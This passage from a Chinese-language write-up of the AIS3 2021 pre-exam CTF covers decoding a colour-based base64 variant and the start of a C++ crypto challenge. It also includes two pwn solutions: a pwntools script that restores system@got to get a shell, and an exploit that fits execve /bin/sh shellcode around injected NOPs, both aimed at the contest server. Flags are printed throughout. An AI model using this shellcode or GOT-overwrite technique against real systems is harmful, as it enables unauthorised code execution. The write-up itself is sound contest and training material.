style="color:#ae81ff">0x2</span>]))[<span style="color:#e6db74">&#39;join&#39;</span>](<span style="color:#e6db74">&#39;&#39;</span>),
                                <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">+=</span> <span style="color:#ae81ff">0x1</span>;
                            <span style="color:#66d9ef">else</span> {
                                <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>][<span style="color:#e6db74">&#39;length&#39;</span>] <span style="color:#f92672">==</span> <span style="color:#ae81ff">0x1</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">SEQ</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xa</span>)
                                    <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;textContent&#39;</span>] <span style="color:#f92672">+=</span> String[<span style="color:#e6db74">&#39;fromCharCode&#39;</span>](<span style="color:#a6e22e">LISTENER</span>[<span style="color:#e6db74">&#39;key&#39;</span>][<span style="color:#e6db74">&#39;charCodeAt&#39;</span>]());
                                <span style="color:#66d9ef">else</span>
                                    <span style="color:#66d9ef">return</span>;
                            }
                        }
                    }
                }
            }
        }
    }
    <span style="color:#a6e22e">update</span>(<span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x1e21d9</span>[<span style="color:#e6db74">&#39;textContent&#39;</span>]);
}
</code></pre></div><p>基本上就是從EventListener抓你輸入的十個key</p>
<p>可以看出secret code是 <strong>↑↑↓↓←←→→ba</strong></p>
<p>輸入secret code後還不放過你：</p>
<figure><img src="/img/ais3_2021/pre_exam/colors02.png"/>
</figure>

<p>接下來我們可以輸入任意字串，網站會給我們看encode後的結果</p>
<p>寫出decoder後應該就能還原flag了</p>
<p>先來看看他的encoding邏輯：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">TAG</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">cid</span>,<span style="color:#a6e22e">rid</span>,<span style="color:#a6e22e">chr</span>)=&gt;<span style="color:#e6db74">&#39;&lt;span&gt;&lt;div\x20class=\x22c&#39;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">cid</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;\x20r&#39;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">rid</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;\x22&gt;&#39;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">chr</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;&lt;/div&gt;&lt;/span&gt;&#39;</span>;
<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">b64</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;AlS3{BasE64_i5+b0rNIng~\\Qwo/-xH8WzCj7vFD2eyVktqOL1GhKYufmZdJpX9}&#34;</span>;

<span style="color:#66d9ef">function</span> <span style="color:#a6e22e">encode</span>(<span style="color:#a6e22e">INPUT</span>) {
    <span style="color:#66d9ef">const</span> <span style="color:#ae81ff">_0</span><span style="color:#a6e22e">x9fe181</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">f2</span>;
    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">INPUT</span>[<span style="color:#e6db74">&#39;length&#39;</span>])
        <span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#39;&#39;</span>;
    <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">BIN</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
      , <span style="color:#a6e22e">result</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
      , <span style="color:#a6e22e">rest</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0</span>;
    <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">i</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0</span>; <span style="color:#a6e22e">i</span> <span style="color:#f92672">&lt;</span> <span style="color:#a6e22e">INPUT</span>[<span style="color:#e6db74">&#39;length&#39;</span>]; <span style="color:#a6e22e">i</span><span style="color:#f92672">++</span>)
		<span style="color:#75715e">// appends ASCII bin string for each char in input
</span><span style="color:#75715e"></span>        <span style="color:#a6e22e">BIN</span> <span style="color:#f92672">+=</span> <span style="color:#a6e22e">INPUT</span>[<span style="color:#e6db74">&#39;charCodeAt&#39;</span>](<span style="color:#a6e22e">i</span>)[<span style="color:#e6db74">&#39;toString&#39;</span>](<span style="color:#ae81ff">0x2</span>)[<span style="color:#e6db74">&#39;padStart&#39;</span>](<span style="color:#ae81ff">0x8</span>, <span style="color:#e6db74">&#39;0&#39;</span>);
    <span style="color:#a6e22e">rest</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">BIN</span>[<span style="color:#e6db74">&#39;length&#39;</span>] <span style="color:#f92672">%</span> <span style="color:#a6e22e">ten</span> <span style="color:#f92672">/</span> <span style="color:#ae81ff">0x2</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x1</span>;
    <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">rest</span> <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">0x1</span>)
		<span style="color:#75715e">// pad the bin string to a multiple of ten
</span><span style="color:#75715e"></span>        <span style="color:#a6e22e">BIN</span> <span style="color:#f92672">+=</span> <span style="color:#e6db74">&#39;0&#39;</span>[<span style="color:#e6db74">&#39;repeat&#39;</span>](<span style="color:#a6e22e">ten</span> <span style="color:#f92672">-</span> <span style="color:#a6e22e">BIN</span>[<span style="color:#e6db74">&#39;length&#39;</span>] <span style="color:#f92672">%</span> <span style="color:#a6e22e">ten</span>);
	<span style="color:#75715e">// split into sections of 10 bits
</span><span style="color:#75715e"></span>    <span style="color:#a6e22e">BIN</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">BIN</span>[<span style="color:#e6db74">&#39;match&#39;</span>](<span style="color:#e6db74">/(.{1,10})/g</span>);
    <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">section</span> <span style="color:#66d9ef">of</span> <span style="color:#a6e22e">BIN</span>) {
		<span style="color:#75715e">// x from 0 to 1023
</span><span style="color:#75715e"></span>        <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">x</span> <span style="color:#f92672">=</span> parseInt(<span style="color:#a6e22e">section</span>, <span style="color:#ae81ff">0x2</span>);
		<span style="color:#75715e">// bit 6 to 8 bit determines color
</span><span style="color:#75715e"></span>		<span style="color:#75715e">// bit 9 determines ???
</span><span style="color:#75715e"></span>		<span style="color:#75715e">// bit 0 to 5 determines char
</span><span style="color:#75715e"></span>        <span style="color:#a6e22e">result</span> <span style="color:#f92672">+=</span> <span style="color:#a6e22e">TAG</span>(<span style="color:#a6e22e">x</span> <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">0x6</span> <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0x7</span>, <span style="color:#a6e22e">x</span> <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">0x9</span>, <span style="color:#a6e22e">b64</span>[<span style="color:#a6e22e">x</span> <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0x3f</span>]);
    }
    <span style="color:#66d9ef">for</span> (; <span style="color:#a6e22e">rest</span> <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x0</span>; <span style="color:#a6e22e">rest</span><span style="color:#f92672">--</span>) {
        <span style="color:#a6e22e">result</span> <span style="color:#f92672">+=</span> <span style="color:#a6e22e">TAG</span>(<span style="color:#a6e22e">rest</span> <span style="color:#f92672">%</span> <span style="color:#a6e22e">eight</span>, <span style="color:#ae81ff">0x0</span>, <span style="color:#e6db74">&#39;=&#39;</span>);
    }
    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">result</span>;
}
</code></pre></div><p>每五個字元會把Ascii延伸到8-bit之後再接起來，這樣是一團40-bit的資訊</p>
<p>然後以10-bit為一單位編碼成四個字元</p>
<p>10-bit的用法是：</p>
<ul>
<li>bit 0-5 從64個字元選一種</li>
<li>bit 6-8 從8種顏色選一種</li>
<li>bit 9 不知道在幹麻我也懶的弄清楚</li>
</ul>
<p>接下來就是把encoded flag的資訊抓下來然後寫decoder：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#a6e22e">enc</span> <span style="color:#f92672">=</span> [
	<span style="color:#e6db74">&#34;04B&#34;</span>, <span style="color:#e6db74">&#34;02g&#34;</span>, <span style="color:#e6db74">&#34;03i&#34;</span>, <span style="color:#e6db74">&#34;15J&#34;</span>, <span style="color:#75715e">// 40 bits of data
</span><span style="color:#75715e"></span>	<span style="color:#e6db74">&#34;066&#34;</span>, <span style="color:#e6db74">&#34;10\\&#34;</span>, <span style="color:#e6db74">&#34;03w&#34;</span>, <span style="color:#e6db74">&#34;041&#34;</span>,
	<span style="color:#e6db74">&#34;03A&#34;</span>, <span style="color:#e6db74">&#34;14j&#34;</span>, <span style="color:#e6db74">&#34;04\\&#34;</span>, <span style="color:#e6db74">&#34;141&#34;</span>,
	<span style="color:#e6db74">&#34;03g&#34;</span>, <span style="color:#e6db74">&#34;07u&#34;</span>, <span style="color:#e6db74">&#34;03i&#34;</span>, <span style="color:#e6db74">&#34;01k&#34;</span>,
	<span style="color:#e6db74">&#34;03l&#34;</span>, <span style="color:#e6db74">&#34;047&#34;</span>, <span style="color:#e6db74">&#34;06x&#34;</span>, <span style="color:#e6db74">&#34;05i&#34;</span>,
	<span style="color:#e6db74">&#34;05X&#34;</span>, <span style="color:#e6db74">&#34;01K&#34;</span>, <span style="color:#e6db74">&#34;01I&#34;</span>, <span style="color:#e6db74">&#34;04h&#34;</span>,
	<span style="color:#e6db74">&#34;05X&#34;</span>, <span style="color:#e6db74">&#34;00K&#34;</span>, <span style="color:#e6db74">&#34;14i&#34;</span>, <span style="color:#e6db74">&#34;15l&#34;</span>,
	<span style="color:#e6db74">&#34;076&#34;</span>, <span style="color:#e6db74">&#34;07f&#34;</span>, <span style="color:#e6db74">&#34;04o&#34;</span>, <span style="color:#e6db74">&#34;016&#34;</span>,
	<span style="color:#e6db74">&#34;055&#34;</span>, <span style="color:#e6db74">&#34;07K&#34;</span>, <span style="color:#e6db74">&#34;11n&#34;</span>, <span style="color:#e6db74">&#34;158&#34;</span>,
	<span style="color:#e6db74">&#34;077&#34;</span>, <span style="color:#e6db74">&#34;14B&#34;</span>, <span style="color:#e6db74">&#34;05-&#34;</span>, <span style="color:#e6db74">&#34;118&#34;</span>,
	<span style="color:#e6db74">&#34;04w&#34;</span>, <span style="color:#e6db74">&#34;13a&#34;</span>, <span style="color:#e6db74">&#34;01r&#34;</span>, <span style="color:#e6db74">&#34;14z&#34;</span>,
	<span style="color:#e6db74">&#34;07K&#34;</span>, <span style="color:#e6db74">&#34;03=&#34;</span>, <span style="color:#e6db74">&#34;02=&#34;</span>, <span style="color:#e6db74">&#34;01=&#34;</span>,
];

<span style="color:#a6e22e">b64</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;AlS3{BasE64_i5+b0rNIng~\\Qwo/-xH8WzCj7vFD2eyVktqOL1GhKYufmZdJpX9}&#34;</span> <span style="color:#75715e">// 64 chars
</span><span style="color:#75715e"></span><span style="color:#a6e22e">flag</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>

<span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">seg</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#a6e22e">seg</span> <span style="color:#f92672">&lt;</span> <span style="color:#a6e22e">enc</span>.<span style="color:#a6e22e">length</span>; <span style="color:#a6e22e">seg</span><span style="color:#f92672">+=</span><span style="color:#ae81ff">4</span>) {
	<span style="color:#a6e22e">bits</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
	<span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">i</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#a6e22e">i</span> <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">4</span>; <span style="color:#a6e22e">i</span><span style="color:#f92672">++</span>) {
		<span style="color:#a6e22e">bits</span> <span style="color:#f92672">+=</span> <span style="color:#a6e22e">enc</span>[<span style="color:#a6e22e">seg</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">i</span>][<span style="color:#ae81ff">0</span>];
		<span style="color:#a6e22e">bits</span> <span style="color:#f92672">+=</span> (parseInt(<span style="color:#a6e22e">enc</span>[<span style="color:#a6e22e">seg</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">i</span>][<span style="color:#ae81ff">1</span>])<span style="color:#f92672">&gt;&gt;&gt;</span><span style="color:#ae81ff">0</span>).<span style="color:#a6e22e">toString</span>(<span style="color:#ae81ff">2</span>).<span style="color:#a6e22e">padStart</span>(<span style="color:#ae81ff">3</span>, <span style="color:#e6db74">&#39;0&#39;</span>);
		<span style="color:#a6e22e">bits</span> <span style="color:#f92672">+=</span> (<span style="color:#a6e22e">b64</span>.<span style="color:#a6e22e">indexOf</span>(<span style="color:#a6e22e">enc</span>[<span style="color:#a6e22e">seg</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">i</span>][<span style="color:#ae81ff">2</span>])<span style="color:#f92672">&gt;&gt;&gt;</span><span style="color:#ae81ff">0</span>).<span style="color:#a6e22e">toString</span>(<span style="color:#ae81ff">2</span>).<span style="color:#a6e22e">padStart</span>(<span style="color:#ae81ff">6</span>, <span style="color:#e6db74">&#39;0&#39;</span>);
	}
	<span style="color:#a6e22e">bits</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">bits</span>.<span style="color:#a6e22e">match</span>(<span style="color:#e6db74">/.{1,8}/g</span>);
	<span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">i</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#a6e22e">i</span> <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">5</span>; <span style="color:#a6e22e">i</span><span style="color:#f92672">++</span>)
		<span style="color:#a6e22e">flag</span> <span style="color:#f92672">+=</span> String.<span style="color:#a6e22e">fromCharCode</span>(parseInt(<span style="color:#a6e22e">bits</span>[<span style="color:#a6e22e">i</span>], <span style="color:#ae81ff">2</span>))
}
<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">flag</span>);
</code></pre></div><p>很多人(我也有份)一開始上傳</p>
<p><code>AlS3{BasE64_i5+b0rNIng~\\Qwo/-xH8WzCj7vFD2eyVktqOL1GhKYufmZdJpX9}</code></p>
<p>一直到官方出來澄清這不是Flag別再傳了&hellip;</p>
<p>然後寫完才想到其實decoder用Python寫就好了，幹麻繼續寫JS折磨自己 XD</p>
<p><code>AIS3{base1024_15_c0l0RFuL_GAM3_CL3Ar_thIS_IS_y0Ur_FlaG!}</code></p>
<hr>
<h1 id="pwn">
  PWN
  <a class="heading-link" href="#pwn">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<h2 id="write-me">
  Write Me
  <a class="heading-link" href="#write-me">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目有給Source</p>
<p>基本上就是讓你寫8-byte到任意地方</p>
<p>只是因為<code>system@got</code>被寫0，最後的<code>system(&quot;/bin/sh&quot;);</code>跑不出來</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>()
{
    setvbuf(stdin, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0</span>);
    setvbuf(stdout, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0</span>);
    <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>systemgot <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x404028</span>;
    <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>scanfgot <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x404040</span>;
    <span style="color:#f92672">*</span>(<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)systemgot <span style="color:#f92672">=</span> (<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span>)<span style="color:#ae81ff">0x0</span>;

    printf(<span style="color:#e6db74">&#34;Address: &#34;</span>);
    <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>addr;
    <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> v;
    scanf(<span style="color:#e6db74">&#34;%ld&#34;</span>,<span style="color:#f92672">&amp;</span>addr);
    printf(<span style="color:#e6db74">&#34;Value: &#34;</span>);
    scanf(<span style="color:#e6db74">&#34;%ld&#34;</span>,<span style="color:#f92672">&amp;</span>v);
    <span style="color:#f92672">*</span>(<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)addr <span style="color:#f92672">=</span> (<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span>)v;

    <span style="color:#f92672">*</span>(<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)scanfgot <span style="color:#f92672">=</span> (<span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span>)<span style="color:#ae81ff">0x0</span>;
    printf(<span style="color:#e6db74">&#34;OK! Shell for you :)</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
    system(<span style="color:#e6db74">&#34;/bin/sh&#34;</span>);
    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
}
</code></pre></div><p>binary的名字叫做gotplt</p>
<p>checksec 的結果是Partial Relocation + No PIE</p>
<p>也就是這個ELF裡面的offset在每次執行都一樣，而且GOT table可寫</p>
<p>所以把<code>system@got</code>的位址還原就可以順利跑<code>system(&quot;/bin/sh&quot;)</code>了</p>
<p>因為是用<code>scanf(&quot;%ld&quot;)</code>，所以要記得把位址轉十進位再輸入</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
<span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>

context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;amd64&#39;</span>
context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span>
binary <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#39;./gotplt&#39;</span>)

<span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>REMOTE:
    p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#39;quiz.ais3.org&#39;</span>, <span style="color:#ae81ff">10102</span>)
<span style="color:#66d9ef">else</span>:
    p <span style="color:#f92672">=</span> process(binary<span style="color:#f92672">.</span>path)

p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;Address: &#39;</span>)
p<span style="color:#f92672">.</span>sendline(str(<span style="color:#ae81ff">4210728</span>))
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;Value: &#39;</span>)
p<span style="color:#f92672">.</span>sendline(str(<span style="color:#ae81ff">4198480</span>))
p<span style="color:#f92672">.</span>interactive()
</code></pre></div><p>flag 放在home/gotplt/flag</p>
<p><code>AIS3{Y0u_know_h0w_1@2y_b1nd1ng_w@rking}</code></p>
<p>話說GOT Hijacking不是應該會和ROP一起出成某個模板題嗎？</p>
<p>這題的考法也太直白&hellip;就算不知道lazy binding好像也能瞎猜出來？</p>
<hr>
<h2 id="noper">
  Noper
  <a class="heading-link" href="#noper">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目沒給Source</p>
<p>它會讀64-byte 進去然後當做 opcode 去執行</p>
<p>只是在執行前會用<code>rand()</code>選出一些byte然後寫入0x90 (x86-64指令集的NOP指令)</p>
<p>因為是從64-byte當中選出9個，一開始以為多傳幾次就好了</p>
<p>看了老半天才發現他根本沒做過srand(time(NULL))</p>
<p>這種時候相當於用srand(1)初始化</p>
<p>所以本機和伺服器上每次執行時填NOP的位置都一樣</p>
<p>接下來就是把payload裡的opcode分段塞進不會被填NOP的縫隙裡</p>
<p>我塞的shellcode是<a href="http://shell-storm.org/shellcode/files/shellcode-603.php">這個</a></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
<span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>

context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;amd64&#39;</span>
context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span>
binary <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#39;./noper&#39;</span>)

<span style="color:#66d9ef">if</span> args<span style="color:#f92672">.</span>REMOTE:
    p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#39;quiz.ais3.org&#39;</span>, <span style="color:#ae81ff">5002</span>)
<span style="color:#66d9ef">else</span>:
    p <span style="color:#f92672">=</span> process(binary<span style="color:#f92672">.</span>path)

<span style="color:#75715e"># NOP in payload: 6, 10, 13, 17, 39, 41, 44, 51, 63</span>
payload  <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x48\x31\xd2\x90\x90\x90\x90\x90</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 0 - 7</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 8  - 17</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 18 - 27</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 28 - 37</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x90\x90\x90\x90\x90\x90\x90</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 38 - 44</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x48\x89\xe6\xb0\x3b\x90\x90</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 45 - 51</span>
payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x0f\x05</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># 52 - 53</span>

p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;code:</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)
p<span style="color:#f92672">.</span>sendline(payload)
p<span style="color:#f92672">.</span>interactive()
</code></pre></div><p>flag 放在 home/noper/flag</p>
<p><code>AIS3{nOp_noOp_NOoop!!!}</code></p>
<p>蠻有趣的塞shellcode題</p>
<p>這一題是首殺、豪爽</p>
<hr>
<h1 id="crypto">
  CRYPTO
  <a class="heading-link" href="#crypto">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<h2 id="microchip">
  Microchip
  <a class="heading-link" href="#microchip">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目Source是C++，只是用macro和template之類的東東</p>
<p>把語法弄得很像Python，這也太變態了吧</p>
<p>幸好加密邏輯很單純</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cpp" data-lang="cpp"><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;python.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
def <span style="color:#a6e22e">track</span>(name, id) <span style="color:#f92672">-&gt;</span> str <span style="color:#960050;background-color:#1e0010">꞉</span>                                                    {

    <span style="color:#66d9ef">if</span> len(name) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span> <span style="color:#960050;background-color:#1e0010">꞉</span>                                                     ){
        padded <span style="color:#f92672">=</span> name <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;4444&#34;</span>                                                  ;}
    elif len(name) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span> <span style="color:#960050;background-color:#1e0010">꞉</span>                                                   ){
        padded <span style="color:#f92672">=</span> name <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;333&#34;</span>                                                   ;}
    elif len(name) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">2</span> <span style="color:#960050;background-color:#1e0010">꞉</span>                                                   ){
        padded <span style="color:#f92672">=</span> name <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;22&#34;</span>                                                    ;}
    elif len(name) <span style="color:#f92672">%</span> <span style="color:#ae81ff">4</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">3</span> <span style="color:#960050;background-color:#1e0010">꞉</span>                                                   ){
        padded <span style="color:#f92672">=</span> name <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;1&#34;</span>                                                     ;}

    keys <span style="color:#f92672">=</span> list()                                                               ;
    temp <span style="color:#f92672">=</span> id                                                                   ;
    <span style="color:#66d9ef">for</span> i in range(<span style="color:#ae81ff">4</span>) <span style="color:#960050;background-color:#1e0010">꞉</span>                                                         ){
        keys.append(temp <span style="color:#f92672">%</span> <span style="color:#ae81ff">96</span>)                                                  ;
        temp <span style="color:#f92672">=</span> <span style="color:#66d9ef">int</span>(temp <span style="color:#f92672">/</span> <span style="color:#ae81ff">96</span>)                                                   ;}

    result <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>                                                                 ;
    <span style="color:#66d9ef">for</span> i in range(<span style="color:#ae81ff">0</span>, len(padded), <span style="color:#ae81ff">4</span>) <span style="color:#960050;background-color:#1e0010">꞉</span>                                         ){

        nums <span style="color:#f92672">=</span> list()                                                           ;
        <span style="color:#66d9ef">for</span> j in range(<span style="color:#ae81ff">4</span>) <span style="color:#960050;background-color:#1e0010">꞉</span>                                                     ){
            num <span style="color:#f92672">=</span> ord(padded[i <span style="color:#f92672">+</span> j]) <span style="color:#f92672">-</span> <span style="color:#ae81ff">32</span>                                       ;
            num <span style="color:#f92672">=</span> (num <span style="color:#f92672">+</span> keys[j]) <span style="color:#f92672">%</span> <span style="color:#ae81ff">96</span>                                          ;
            nums.append(num <span style="color:#f92672">+</span> <span style="color:#ae81ff">32</span>)                                               ;}

        result <span style="color:#f92672">+=</span> chr(nums[<span style="color:#ae81ff">3</span>])                                                  ;
        result <span style="color:#f92672">+=</span> chr(nums[<span style="color:#ae81ff">2</span>])                                                  ;
        result <span style="color:#f92672">+=</span> chr(nums[<span style="color:#ae81ff">1</span>])                                                  ;
        result <span style="color:#f92672">+=</span> chr(nums[<span style="color:#ae81ff">0</span>])                                                  ;}

    <span style="color:#66d9ef">return</span> result                                                               ;}


def <span style="color:#a6e22e">main</span>() <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">int</span> <span style="color:#960050;background-color:#1e0010">꞉</span>                                                             {

    name <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#34;flag.txt&#34;</span>, <span style="color:#e6db74">&#34;r&#34;</span>).read().strip()                                 ;
    id <span style="color:#f92672">=</span> <span style="color:#66d9ef">int</span>(input(<span style="color:#e6db74">&#34;key = &#34;</span>))                                                   ;

    print(<span style="color:#e6db74">&#34;result is:&#34;</span>, track(name, id))                                        ;
	<span style="color:#75715e">//     result is: =Js&amp;;*A`odZHi&#39;&gt;D=Js&amp;#i-DYf&gt;Uy&#39;yuyfyu&lt;)Gu
